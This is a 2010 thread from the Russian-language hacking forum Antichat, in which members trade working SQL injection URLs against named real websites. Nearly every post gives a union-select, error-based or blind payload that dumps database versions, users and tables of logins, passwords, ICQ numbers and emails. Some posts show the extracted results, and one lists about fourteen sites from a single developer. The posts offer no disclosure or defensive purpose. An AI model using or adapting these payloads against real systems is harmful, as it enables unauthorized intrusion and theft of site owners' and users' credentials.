HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12931  
Старый 01.09.2010, 03:40
Kusto
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
Провел на форуме:
7518056

Репутация: 1089


Отправить сообщение для Kusto с помощью ICQ
По умолчанию

это просто от скуки

Код:
Code:
http://www.znaki.chebnet.com/s10.php?id=-660+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7+--+
ну а это вроде игровой портал

Яндекс тИЦ: 210

Яндекс.Rank: 4

Google PageRank: 3/10

Код:
Code:
http://www.gamesector.org/review.php?id=-141+union+select+1,2,concat_ws(0x3a,nick,icq,email),4,5,6,7,8,9,10,11+from+gs_authors+--+
 
Ответить с цитированием

  #12932  
Старый 01.09.2010, 08:35
tracy
Познающий
Регистрация: 24.03.2009
Сообщений: 54
Провел на форуме:
333485

Репутация: 13
По умолчанию

http://www.sw-rent.pl/index.php?id=00000103+or+(select+count(*)from(sele ct+1+union+select+2+union+select+3)x+group+by+conc at(mid((select+version()),1,64),floor(rand(0)*2)))--

http://www2.kro.nl/boemerang/index.php?offset=876&logid=-175+UnIon+selECt+1,2,3,version%28%29,5,6,7,8,9,10, 11,12,13,14,15+--+

Тупейший вывод таблиц)

http://www.linkdump.be/index.php?y=2006&m=2+and+1=0+union+select+version% 28%29,2,3,4,5,6,7,8+--+
 
Ответить с цитированием

  #12933  
Старый 01.09.2010, 09:24
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

AVON

http://avon4u.ru/news.php?id=-443+and+1=2+union+select+1,2,concat(@@version,0x20 ,user(),0x20,database(),0x20,@@version_compile_os) ,4,5,6,7,8,9,10,11+--

version : 5.0.89-log

user : wtavon4u@localhost

database : wtavon4u

os : unknown-freebsd7.2
 
Ответить с цитированием

  #12934  
Старый 01.09.2010, 13:36
-PRIVAT-
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917

Репутация: 17
По умолчанию

Цитата:
Сообщение от None  
http://www.rusdeutsch.eu/print_text.php?id=-3662+union+select+1,concat%28@i:=0x00,@o:=0x0d0a,b enchmark%2815,@o:=CONCAT%28@o,0x0d0a,%28SELECT+con cat%28table_schema,0x2E,@i:=table_name%29+from+inf ormation_schema.tables+WHERE+table_name%3E@i+order +by+table_name+LIMIT%201%29%29%29,@o%29,3,4,5,6,7, 8,9,0,1,2,3%20--
Цитата:
Сообщение от None  
http://www.shefgoda.ru/?part=news&newsid=-36+union+select+1,concat_ws(0x3a,Login,Password,IC Q),3,4,5,6,7,8,9,0,1,2+from+chief_users

ТИЦ 10 ПР 4
" if author else f"
Цитата:
http://www.rusdeutsch.eu/print_text.php?id=-3662+union+select+1,concat%28@i:=0x00,@o:=0x0d0a,b enchmark%2815,@o:=CONCAT%28@o,0x0d0a,%28SELECT+con cat%28table_schema,0x2E,@i:=table_name%29+from+inf ormation_schema.tables+WHERE+table_name%3E@i+order +by+table_name+LIMIT%201%29%29%29,@o%29,3,4,5,6,7, 8,9,0,1,2,3%20--
Цитата:
Сообщение от None  
http://www.shefgoda.ru/?part=news&newsid=-36+union+select+1,concat_ws(0x3a,Login,Password,IC Q),3,4,5,6,7,8,9,0,1,2+from+chief_users

ТИЦ 10 ПР 4
 
Ответить с цитированием

  #12935  
Старый 01.09.2010, 13:37
-PRIVAT-
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917

Репутация: 17
По умолчанию

Привет всем! На днях нашёл уязвимый сайт. Смотрю, внизу стоит ссылка на разраюотчика, я естественно перешёл по ней и все сайты оказались... уязвимы! Их было около 30. Но, вот в чём была проблема, у всех одинаковые хеши, увы, рассшифровать их, никто не смог (на Ачате). Вот сам сайт разработчика webinstruments.ru . Снизу, скуля на нём

Цитата:
Сообщение от None  
http://webinstruments.ru/?part=news&newsid=-4+union+select+1,concat_ws%280x3a,ID,Login,Passwor d%29,3,4,5,6,7,8,9,0,1,2+from+FE_se_users--


ТИЦ10(R2) PR2

Цитата:
Сообщение от None  
http://ures.ru/?subsectionid=21+union+select+1,2,3,4,5,6,7,8,9,0, 1,2,3,4%20--


ТИЦ10(R2)

Цитата:
Сообщение от None  
http://www.bbp-alians.ru/?part=projects&movieid=-12+union+select+1,concat_ws%280x3a,ID,Login,Passwo rd,ICQ%29,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9+from+a lliance_users--


ТТИЦ10(R2) PR2

Цитата:
Сообщение от None  
http://www.map-wzm.ru/?part=news&newsid=-2+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3--


ТИЦ10(R2) PR1

Цитата:
Сообщение от None  
http://petersburg-tour.ru/?part=ny&subsectionid=-226+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5%20--


ТИЦ40YC(R3) PR4

Цитата:
Сообщение от None  
http://kino-focus.ru/?part=projects&elementid=17+union+select+1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5%20--


Цитата:
Сообщение от None  
http://www.shefgoda.ru/?part=news&newsid=-36+union+select+1,concat_ws(0x3a,Login,Password,IC Q),3,4,5,6,7,8,9,0,1,2+from+chief_users --


ТИЦ60(R3) PR3

Цитата:
Сообщение от None  
http://www.moscowatch.ru/swissmade_brand.php?BrandId=-2+union+select+1,2,3--


ТИЦ70YC(R3) PR5

Цитата:
Сообщение от None  
http://www.goldenpuzzle.ru/?part=gallery&section=code4&subsectionid=-1276+union+select+1,concat_ws%280x3a,Login,Passwor d,ICQ%29,3,4,5,6,7,8,9,0,1,2,3,4,5,6+from+puzzle_u sers--


ТИЦ20(R2) PR20

Цитата:
Сообщение от None  
http://www.fregat-blagodat.ru/?part=events&newsid=21+union+select+1,concat_ws(0x 3a,Login,Password,ICQ),3,4,5,6,7,8,9,0,1,2+from+co n_sltr__users--


ТИЦ20(R2) PR2

Цитата:
Сообщение от None  
http://www.pravdinskoe.ru/?part=news&newsid=29+union+select+1,2,3,4,5,6,7,8, 9,0,1,2,3%20--


ТИЦ20(R2)

Цитата:
Сообщение от None  
http://www.lmarsh.spb.ru/?part=portfolio&elementid=-34+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5--


Цитата:
Сообщение от None  
http://www.mens-gifts.ru/?part=gallery&elementid=-28+union+select+1,2,3,4,5,6,7,8,9,0--


ТИЦ10(R2) PR1

Цитата:
Сообщение от None  
http://www.lightinside.ru/?part=catalog&section=eglo&subsectionid=-16+union+select+1,2,3,4,5,6,7,8,9,0,1%20--


ТИЦ10YC(R2) PR1

P.S

Это ещё не все сайты. Смотрите остальные в портфолио разработчика

Удачи!
 
Ответить с цитированием

  #12936  
Старый 01.09.2010, 13:44
Gedj
Познающий
Регистрация: 15.09.2008
Сообщений: 54
Провел на форуме:
612815

Репутация: 46
По умолчанию

Код:
Code:
http://www.formex.ru/catalog.php?id=-1003+union+select+table_name,2+from+information_schema.tables+limit+1,1--
 
Ответить с цитированием

  #12937  
Старый 01.09.2010, 13:51
stepashka_
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
Провел на форуме:
7879791

Репутация: 265


Отправить сообщение для stepashka_ с помощью ICQ
По умолчанию

Код:
Code:
http://www.elecboard.ru/ind.php?pn=2&id_categ=-49+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
5.0.87-percona-highperf-logetrovich1975_123etrovich1975@localhost

тиц 10

PageRank 1

Код:
Code:
http://www.bbsplus.ru/ind.php?pn=9&id_categ=-13+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--+
5.1.39:yambi_bbsplus:yambi_bbsplus@localhost

PageRank 2

Код:
Code:
http://www.elecab.ru/board/ind.php?pn=15&id_categ=-41+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
4.1.25-log:elecab43_elecab:elecab43_userel@localhost

тиц 20

PageRank 2
 
Ответить с цитированием

  #12938  
Старый 01.09.2010, 16:41
av1
Участник форума
Регистрация: 06.10.2008
Сообщений: 165
Провел на форуме:
355997

Репутация: 66
Отправить сообщение для av1 с помощью ICQ
По умолчанию

Код:
Code:
http://www.ceit.es/index.php?option=com_personal&view=detalle&trbId=-105+UNION+SELECT+1,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,3,4,5,6,7%20from%20ivj_users%20limit%200,1--&catId=91&prsId=1&Itemid=25&lang=en
Username: jmuser@localhost

Version: 5.0.51a-24+lenny3

Database: ceit


Google PR: 6
 
Ответить с цитированием

  #12939  
Старый 01.09.2010, 17:56
NorB
Познающий
Регистрация: 20.07.2007
Сообщений: 99
Провел на форуме:
1562993

Репутация: 25
По умолчанию

http://eclassifieds.massagetoday.com/eclassified/detail.php?&id=7842'+group+by+19+/*+

там 18 полей,

немогу раскрутить)

http://www.massagetoday.com/mpacms/mt/year.php?year=2009'+union+select+1,2+/*+

а тута нету доступа к information_schema.tables
 
Ответить с цитированием

  #12940  
Старый 01.09.2010, 18:53
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Искал запчасти

http://www.rulu.ru/catalogs/index.html?brid=538&mdl=5020+and+ascii(lower(subst ring((select+table_name+from+information_schema.ta bles+limit+17,1),1,1)))%3E1

2NorB:

Боюсь тебя удивить, но в 4-ой ветке никогда не было information_schema.tables
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ